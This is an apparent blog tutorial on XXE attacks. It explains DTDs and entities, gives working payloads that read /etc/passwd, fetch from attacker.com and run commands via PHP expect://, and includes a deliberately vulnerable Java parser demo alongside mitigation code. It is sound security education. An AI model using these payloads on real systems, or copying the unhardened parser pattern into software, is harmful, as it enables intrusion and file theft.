Extensible Markup Language (XML) has an infamous feature called external entities, and the attack that abuses it is known as XML eXternal Entities (XXE). It is the best-known XML attack vector: it ranked fourth in the OWASP Top 10 for 2017 and was folded into the Security Misconfiguration category in the 2021 edition.
This blog post explains how to exploit the vulnerability to gain access to sensitive data and also how to mitigate it.
Introduction
XXE enables an attacker to craft malicious XML documents. When these documents are parsed by a vulnerable XML parser, data can be fetched from outside the document itself. This data will be parsed as the content of your chosen XML tag. The data can be the contents of a file or the response from an HTTP request.
Oftentimes the contents of an XML tag are displayed back to you, for example in a web page. This way you can view any sensitive data you’ve gained using XXE.
Because external entities are part of the core XML specification, many parsers enable them by default, and they must be turned off manually in a parser-specific way.
Understanding XXE and DTD
What is a DTD?
A DTD is a Document Type Definition, which defines the structure and the legal elements and attributes of an XML document.
Using a DTD, independent groups of people can agree on a standard document format for exchanging data. Applications can use DTDs to verify that XML data corresponds to the specified format.
If the DTD is declared inside the XML file, it must be wrapped inside the <!DOCTYPE> definition:
<?xml version="1.0"?>
<!DOCTYPE note [
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]>
<note>
<to>Brian</to>
<from>Jane</from>
<heading>Reminder</heading>
<body>Don't forget to bring my jacket!</body>
</note>
As you can see above, the DTD defines that there is a note element, which in turn has the child elements to, from, heading and body.
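To make the idea of verifying a document against its DTD concrete, here is a minimal Java sketch. It assumes the JDK's built-in JAXP parser; the class name DtdValidationSketch and its helper are made up for illustration. It only parses trusted, hard-coded strings, which is why leaving DTD processing enabled is acceptable here.

```java
import java.io.IOException;
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.ErrorHandler;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.SAXParseException;

class DtdValidationSketch {
    // The internal DTD from the example above.
    static final String DTD =
        "<!DOCTYPE note [\n"
        + "<!ELEMENT note (to,from,heading,body)>\n"
        + "<!ELEMENT to (#PCDATA)>\n"
        + "<!ELEMENT from (#PCDATA)>\n"
        + "<!ELEMENT heading (#PCDATA)>\n"
        + "<!ELEMENT body (#PCDATA)>\n"
        + "]>\n";

    static final String VALID_NOTE = DTD
        + "<note><to>Brian</to><from>Jane</from>"
        + "<heading>Reminder</heading>"
        + "<body>Don't forget to bring my jacket!</body></note>";

    // The same note without <body>, which the DTD requires.
    static final String INVALID_NOTE = DTD
        + "<note><to>Brian</to><from>Jane</from>"
        + "<heading>Reminder</heading></note>";

    static boolean isValid(String xml) {
        try {
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            factory.setValidating(true); // check the document against its DTD
            DocumentBuilder builder = factory.newDocumentBuilder();
            // Validation problems arrive as recoverable errors, so rethrow them.
            builder.setErrorHandler(new ErrorHandler() {
                @Override public void warning(SAXParseException e) { }
                @Override public void error(SAXParseException e) throws SAXException { throw e; }
                @Override public void fatalError(SAXParseException e) throws SAXException { throw e; }
            });
            builder.parse(new InputSource(new StringReader(xml)));
            return true;
        } catch (SAXException e) {
            return false; // not well-formed, or does not match the DTD
        } catch (ParserConfigurationException | IOException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        System.out.println("valid note accepted:   " + isValid(VALID_NOTE));
        System.out.println("invalid note accepted: " + isValid(INVALID_NOTE));
    }
}
```

The custom error handler matters: without it, the parser reports validity errors but still returns a document.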
Entities
Some characters have a special meaning in XML, like the less-than sign <, which marks the start of an XML tag. Another example is the & sign, which marks the start of an entity reference.
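You may already know the HTML entity &nbsp;. This “non-breaking space” entity is used in HTML, and it expands to a space character that does not allow a line break. Just like in HTML, entities are expanded in XML when a document is parsed by an XML parser. XML also lets a DTD declare its own entities, and an external entity, declared with the SYSTEM keyword, takes its value from a URI instead of from the document itself. XXE abuses exactly that.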
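Entity expansion is easy to observe from code. The following Java sketch assumes the JDK's built-in DOM parser; the class name and the signature entity are invented for illustration. It declares a harmless internal entity and reads the text back after parsing.

```java
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;

class EntityExpansionSketch {
    // "signature" is a made-up internal entity; &lt; is one of XML's predefined entities.
    static final String XML =
        "<!DOCTYPE note [ <!ENTITY signature \"Jane Doe\"> ]>"
        + "<note><from>&signature;</from><body>1 &lt; 2</body></note>";

    // Parses the XML and returns the text of the first element with the given tag name.
    static String textOf(String xml, String tag) {
        try {
            Document doc = DocumentBuilderFactory.newInstance()
                .newDocumentBuilder()
                .parse(new InputSource(new StringReader(xml)));
            return doc.getElementsByTagName(tag).item(0).getTextContent();
        } catch (Exception e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        System.out.println(textOf(XML, "from")); // the entity's replacement text
        System.out.println(textOf(XML, "body")); // the predefined entity, expanded
    }
}
```

The application never sees &signature; at all. By the time it reads the element, the parser has already substituted the entity's value.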
Exploitation
Example code
Here are some examples of how to use XXE to read data from a variety of resources, courtesy of OWASP.
1) Reading /etc/passwd on Linux
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
2) Reading files on Windows
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
3) Making HTTP requests
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt" >]><foo>&xxe;</foo>
Step-by-step exploitation
Example application
Let’s say we have an application where you can leave notes that other people can read. An XML request to this application might look something like this:
<note>
<to>Brian</to>
<from>Jane</from>
<heading>Reminder</heading>
<body>Don't forget to bring my jacket!</body>
</note>
The application parses the XML request and displays a note from Jane with the heading “Reminder” and the body “Don’t forget to bring my jacket!”.
Our goal in this example will be to read the contents of the /etc/passwd file. It’s a convenient file to use because you can usually count on it existing on a Linux system. We want the contents of /etc/passwd to appear in the body section of the note.
Malicious request
If External Entities are enabled, a malicious note could be created like so:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<note>
<to>Brian</to>
<from>Jane</from>
<heading>Reminder</heading>
<body>&xxe;</body>
</note>
As a result, the note to Brian will have the contents of /etc/passwd in its body.
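On the server side, the flaw might look like the following Java sketch. Everything here is an assumption for illustration: the class and method names are made up, the parser is created with factory defaults (which resolve external entities on the JDK versions this sketch assumes), and a temporary file stands in for /etc/passwd so the demo runs on any operating system.

```java
import java.io.IOException;
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;

class VulnerableNoteParser {
    // Parses a note the way a naive server might: factory defaults, no hardening.
    static String readBody(String xml) {
        try {
            Document doc = DocumentBuilderFactory.newInstance()
                .newDocumentBuilder()
                .parse(new InputSource(new StringReader(xml)));
            return doc.getElementsByTagName("body").item(0).getTextContent();
        } catch (Exception e) {
            throw new IllegalStateException(e);
        }
    }

    // Builds the malicious note from the article, pointing the entity at fileUri.
    static String maliciousNote(String fileUri) {
        return "<?xml version=\"1.0\"?>"
            + "<!DOCTYPE foo [ <!ELEMENT foo ANY >"
            + "<!ENTITY xxe SYSTEM \"" + fileUri + "\" > ]>"
            + "<note><to>Brian</to><from>Jane</from>"
            + "<heading>Reminder</heading><body>&xxe;</body></note>";
    }

    // Writes a stand-in secret to a temp file and returns what the parser puts in <body>.
    static String demo() {
        try {
            Path secret = Files.createTempFile("xxe-demo", ".txt");
            try {
                Files.write(secret, "demo-secret".getBytes(StandardCharsets.UTF_8));
                return readBody(maliciousNote(secret.toUri().toString()));
            } finally {
                Files.deleteIfExists(secret);
            }
        } catch (IOException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        System.out.println("body = " + demo());
    }
}
```

Nothing in readBody looks dangerous, which is the point: the application code only asks for the text of an element, and the parser does the file read on the attacker's behalf.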
Other attacks
PHP Remote Code Execution
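If the PHP “expect” extension is loaded, its expect:// stream wrapper lets an external entity run a command on the server, which gives us remote code execution (RCE). The example below runs the id command and returns its output in the user element.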
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>
Custom attacks on various applications
It used to be possible to get Remote Code Execution in many different code editors due to an XXE flaw. It was patched quickly, but it’s an interesting read.
Fixing
The easiest option is to disable DTDs entirely. The following code is in Java:
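import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
// Reject any document that contains a DOCTYPE declaration.
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
DocumentBuilder builder = factory.newDocumentBuilder();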
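To see the effect of this setting, here is a small self-contained sketch, assuming the JDK's built-in parser; the class and method names are hypothetical. With the feature on, the parser should refuse the malicious note as soon as it reaches the DOCTYPE declaration, before any entity is resolved, while a plain note still parses.

```java
import java.io.IOException;
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

class DoctypeRejectionSketch {
    static final String PLAIN_NOTE =
        "<note><to>Brian</to><from>Jane</from>"
        + "<heading>Reminder</heading><body>Hi</body></note>";

    static final String MALICIOUS_NOTE =
        "<!DOCTYPE foo [ <!ELEMENT foo ANY >"
        + "<!ENTITY xxe SYSTEM \"file:///etc/passwd\" > ]>"
        + "<note><to>Brian</to><from>Jane</from>"
        + "<heading>Reminder</heading><body>&xxe;</body></note>";

    // Returns true if the hardened parser refuses to parse the document.
    static boolean isRejected(String xml) {
        try {
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            factory.newDocumentBuilder().parse(new InputSource(new StringReader(xml)));
            return false;
        } catch (SAXException e) {
            return true; // the parser stopped at the DOCTYPE declaration
        } catch (ParserConfigurationException | IOException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        System.out.println("plain note rejected:     " + isRejected(PLAIN_NOTE));
        System.out.println("malicious note rejected: " + isRejected(MALICIOUS_NOTE));
    }
}
```

The trade-off is that legitimate documents carrying a DOCTYPE are rejected as well, so this option only fits applications that never need DTDs.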
If disabling DTDs is not an option, then you must at least configure the XML parser to disable external entities. For more detailed information, refer to OWASP’s XML External Entity Prevention Cheat Sheet.
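For Java's DocumentBuilderFactory, that configuration might look like the sketch below. The feature URIs are the standard SAX and Xerces ones; the class name, the helper methods, and the temporary file standing in for a sensitive file are assumptions made for the demo. Treat it as a starting point, not a complete hardening guide.

```java
import java.io.IOException;
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;

class ExternalEntitiesDisabledSketch {
    // DTDs stay enabled, but nothing outside the document is fetched.
    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        factory.setXIncludeAware(false);
        return factory;
    }

    static String textOf(String xml, String tag) {
        try {
            Document doc = hardenedFactory().newDocumentBuilder()
                .parse(new InputSource(new StringReader(xml)));
            return doc.getElementsByTagName(tag).item(0).getTextContent();
        } catch (Exception e) {
            throw new IllegalStateException(e);
        }
    }

    // One internal entity (title) and one external entity (xxe) in the same note.
    static String note(String fileUri) {
        return "<!DOCTYPE note [ <!ENTITY title \"Reminder\">"
            + "<!ENTITY xxe SYSTEM \"" + fileUri + "\"> ]>"
            + "<note><heading>&title;</heading><body>&xxe;</body></note>";
    }

    // Returns {heading, body} as seen through the hardened parser.
    static String[] demo() {
        try {
            Path secret = Files.createTempFile("xxe-demo", ".txt");
            try {
                Files.write(secret, "demo-secret".getBytes(StandardCharsets.UTF_8));
                String xml = note(secret.toUri().toString());
                return new String[] { textOf(xml, "heading"), textOf(xml, "body") };
            } finally {
                Files.deleteIfExists(secret);
            }
        } catch (IOException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        String[] result = demo();
        System.out.println("heading = " + result[0]);
        System.out.println("body    = " + result[1]);
    }
}
```

The internal entity in the heading should still expand, while the external entity in the body should not pull in the file's contents.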
Conclusion
Any time you see XML used in an application, one of the first things to check is whether it is vulnerable to an XXE attack. And when using XML in your own application, always verify that external entities are disabled.